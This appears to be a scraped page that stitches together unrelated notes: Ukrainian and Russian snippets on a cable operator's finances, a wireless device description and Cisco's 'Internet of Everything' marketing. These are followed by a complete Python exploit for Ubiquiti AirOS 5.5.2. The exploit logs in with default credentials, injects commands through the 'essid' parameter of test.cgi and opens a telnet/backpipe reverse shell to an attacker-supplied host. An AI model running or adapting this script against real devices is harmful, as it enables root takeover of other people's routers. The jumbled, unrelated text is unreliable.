http://ua.korrespond...kompaniyi-volya
Найбільший в країні кабельний оператор (близько 1,5 млн передплатників)
...
- Річний оборот Волі зараз трохи менше 1 млрд грн.
...
56 грн с абона в мес
...
Принципова відмінність України.. Тому вони можуть продавати товар за дуже низькою ціною – 30-35 грн., транслюючи 60-80 каналів.
http://www.unian.ua/...-milyardiv.html
Чистий прибуток Google за рік перевищив $10 мільярдів
Пропеллер APC 2 представляет собой новое устройство беспроводной поколения IEEE 802.11 b/g/n, iPoll (proprietary)
работает в всех режимах:
AP auto WDS, Station, Station WDS, Virtual radios (VSSID), iPoll access point, iPoll client, repeater
Имеет уникальный механизм для выполнения механического изменения параметров антенны для достижения наилучшей производительности в различных режимах работы (патент).
Этот продукт оснащен высокой выходной мощностью (23 дБм) MIMO радио и 11 дБи двойной поляризованной антенной MiMO, которые делают устройство идеально подходит для коротких и средних беспроводной связи диапазона. Пропеллер APC 2 использует все функции операционной системой, которая поддерживает мост / маршрутизатор/ретранслятор (режим ретранслятора позволяет продукту работать как точка доступа и как станция в то же время).
Deliberant OS также поддерживает iPoll - собственная технологии беспроводной связи для увеличения пропускной способности передачи пакетов и стабилизирует задержки в сети. Она имеет удобный Adobe Flex на основе графического интерфейса с мгновенной reconfguration без перезагрузки системы, включает в себя полезные инструменты установки (Site Survey, задержка перезагрузки, анализатор спектра, Ping, Traceroute) и совместима с бесплатной сиcтемой управления сетью (WNMS ) - одна из самых передовых инструментов управления на рынке.
По расчетам консалтингового подразделения Cisco IBSG, к 2020 году количество интеллектуальных устройств, подключенных к Интернету, достигнет 37 миллиардов. Уже сейчас их число превышает общую численность населения Земли. При этом более 99 процентов физических объектов остаются неподключенными к Интернету. Всеобъемлющий Интернет (Internet of Everything, IoE)[1] способен обеспечить подключение еще неподключенных устройств, открывая тем самым небывалые возможности. При этом речь идет не только о неодушевленных предметах. По данным компании Gartner, люди сами превратятся в своеобразные интернет-узлы, непрерывно передающие информацию.
Операторы связи и провайдеры уже подыскивают инновационные приложения для управления потенциалом Всеобъемлющего Интернета, чтобы обеспечить себе конкурентное преимущество. К тому же их привлекает идея получения доступа к таким новым отраслям бизнеса, охваченным IoE, как беспроводное здравоохранение и фитнес.
IP-сеть у Cisco, что называется в генах, и это, плюс интеллектуальное лидерство Cisco в том, что касается разработки концепции Всеобъемлющего Интернета, обеспечивает компании уникальные преимущества, что, в свою очередь, помогает ее заказчикам извлекать выгоду из IoE. Наглядный тому пример – разработанное совместно с компанией Verizon решение Connected Athlete («Подключенный спортсмен»), демонстрирующее огромный потенциал Всеобъемлющего Интернета по созданию огромных ценностей в сфере беспроводного здравоохранения и фитнеса. При этом следует подчеркнуть, что возможности этого решения не ограничиваются указанными рамками – базовая технология применима и к другим отраслям бизнеса.
Connected Athlete дает спортсменам – и просто любителям физических упражнений – возможность получать в реальном времени разнообразную информацию, касающуюся скорости передвижения, применяемых при этом усилий и т.п. Таким образом, располагая объективными данными и аналитическими методами, позволяющими улучшить физические показатели, люди, занимающиеся спортом, могут повысить свои результаты. Вкратце об этом инновационном решении рассказывается в видеоролике, размещенном на странице
Connected Athlete эффективно использует возможности интеллектуальной сети Cisco (Cisco Intelligent Network) и оснащенных беспроводными датчиками «интеллектуальных стелек» от компании ACM Systems, предоставляя оперативные и накопленные биометрические данные (сердечный ритм, частота дыхания, уровень кислорода и углекислого газа в крови, концентрация глюкозы и лактата в крови) занимающихся теми или иными физическими упражнениями. Это дает возможность точно оценить физическое состояние атлета и его энергозатраты в тот или иной момент времени, помогая повысить спортивные показатели и снизить вероятность получения травм. При этом Connected Athlete обеспечивает совместную работу людей, а также взаимодействие с беспроводными (Wireless Body Area Network) и медицинскими физиологическими сетями (Medical Body Area Network).
#!/usr/bin/python
#+--------------------------------------------------------------------------------------------------------------------------------+
# Exploit Title : Ubiquiti AirOS <= 5.5.2 Remote POST-Auth Root Command Execution
# Date : 12-28-2012
# Author : xistence (xistence<[AT]>0x90.nl)
# Software link : <a href="http://www.ubnt.com/eula/?BACK=/downloads/XM-v5.5.2.build14175.bin" target="_blank" rel="noreferrer" style="cursor:help;display:inline !important;">http://www.ubnt.com/eula/?BACK=/downloads/XM-v5.5.2.build14175.bin</a>
# Vendor site : <a href="http://www.ubnt.com/" target="_blank" rel="noreferrer" style="cursor:help;display:inline !important;">http://www.ubnt.com/</a>
# Version : 5.5.2 and lower
# Tested on : PicoStation M2 (hardware)
#
# Vulnerability : The <a href="http://<IP>/test.cgi" target="_blank" rel="noreferrer" style="cursor:help;display:inline !important;">http://<IP>/test.cgi</a> "essid" parameter is not sanitized for input which allows for execution of operating
# system commands. The parameter input field can be like this to create a file /tmp/test.txt:
# "LINKTEST & /bin/touch /tmp/test.txt #"
# Authentication to the web site is necessary to exploit this vulnerability.
#+--------------------------------------------------------------------------------------------------------------------------------+
import urllib, urllib2, cookielib, sys, random, mimetools, mimetypes, itertools, time
print ""
print "[*] Ubiquiti AirOS <= 5.5.2 Remote POST-Auth Root Command Execution - xistence (xistence<[at]>0x90.nl) - 2012-12-28"
print ""
if (len(sys.argv) != 4):
print "[*] Usage: " + sys.argv[0] + " <rhost> <lhost> <lport>"
print ""
exit(0)
rhost = sys.argv[1]
lhost = sys.argv[2]
lport = sys.argv[3]
webUser = "ubnt"
webPass = "ubnt"
# Create a random file with 8 characters
filename = ''
for i in random.sample('abcdefghijklmnopqrstuvwxyz1234567890',8):
filename+=i
filename +=".sh"
shellCmd = '& echo "mknod /tmp/backpipe p ; telnet ' + lhost + ' ' + lport + ' 0</tmp/backpipe | /bin/sh -C 1>/tmp/backpipe 2>/tmp/backpipe ; rm -rf /tmp/backpipe ; rm -rf /tmp/' + filename + '" > /tmp/' + filename + ' ; chmod +x /tmp/' + filename + ' ; /bin/sh /tmp/' + filename + ' #'
class MultiPartForm(object):
"""Accumulate the data to be used when posting a form."""
def __init__(self):
self.form_fields = []
self.files = []
self.boundary = mimetools.choose_boundary()
return
def get_content_type(self):
return 'multipart/form-data; boundary=%s' % self.boundary
def add_field(self, name, value):
"""Add a simple field to the form data."""
self.form_fields.append( ( name, value ) )
return
def __str__(self):
"""Return a string representing the form data, including attached files."""
# Build a list of lists, each containing "lines" of the
# request. Each part is separated by a boundary string.
# Once the list is built, return a string where each
# line is separated by '\r\n'.
parts = []
part_boundary = '--' + self.boundary
# Add the form fields
parts.extend(
[ part_boundary,
'Content-Disposition: form-data; name="%s"' % name,
'',
value,
]
for name, value in self.form_fields
)
# Flatten the list and add closing boundary marker,
# then return CR+LF separated data
flattened = list( itertools.chain( *parts) )
flattened.append( '--' + self.boundary + '--' )
flattened.append( '' )
return '\r\n'.join( flattened )
# Create the form with simple fields
form = MultiPartForm()
form.add_field( 'uri', '' )
form.add_field( 'username', webUser )
form.add_field( 'password', webPass )
form2 = MultiPartForm()
form2.add_field( 'essid', 'LINKTEST ' + shellCmd )
form2.add_field( 'channel', '2412' )
form2.add_field( 'rssithresh', '13' )
form2.add_field( 'file_url', '' )
form2.add_field( 'action', 'test' )
# Our Cookie Jar
cj = cookielib.CookieJar()
opener = urllib2.build_opener( urllib2.HTTPCookieProcessor( cj ) )
# Just open the default url to grab the cookies and put them in the jar
print "[+] Opening default page [<a href="http://%s" target="_blank" rel="noreferrer" style="cursor:help;display:inline !important;">http://%s</a>] to store cookies" % rhost
resp = opener.open( "<a href="http://%s" target="_blank" rel="noreferrer" style="cursor:help;display:inline !important;">http://%s</a>" %rhost )
# Create our multi-part body + headers login POST request
print "[+] Logging in with user [%s] and password [%s] at host [%s]" % ( webUser, webPass, rhost )
resp = urllib2.Request( "<a href="http://%s/login.cgi" target="_blank" rel="noreferrer" style="cursor:help;display:inline !important;">http://%s/login.cgi</a>" % rhost )
body = str( form )
resp.add_header( 'Content-type', form.get_content_type() )
resp.add_header( 'Content-length', len( body ) )
resp.add_data( body )
request = opener.open( resp ).read()
# Create our multi-part body + headers command execution POST request
print "[+] Executing reverse shell commands [file = /tmp/" + filename + "], this might take up to a minute before a response is received in your netcat shell"
resp = urllib2.Request( "<a href="http://%s/test.cgi" target="_blank" rel="noreferrer" style="cursor:help;display:inline !important;">http://%s/test.cgi</a>" % rhost )
body = str( form2 )
resp.add_header( 'Content-type', form2.get_content_type() )
resp.add_header( 'Content-length', len( body ) )
resp.add_data( body )
request = opener.open( resp ).read()
time.sleep(30)
print "[+] Done, check your netcat reverse shell on ip [%s] port [%s]" % ( lhost, lport )
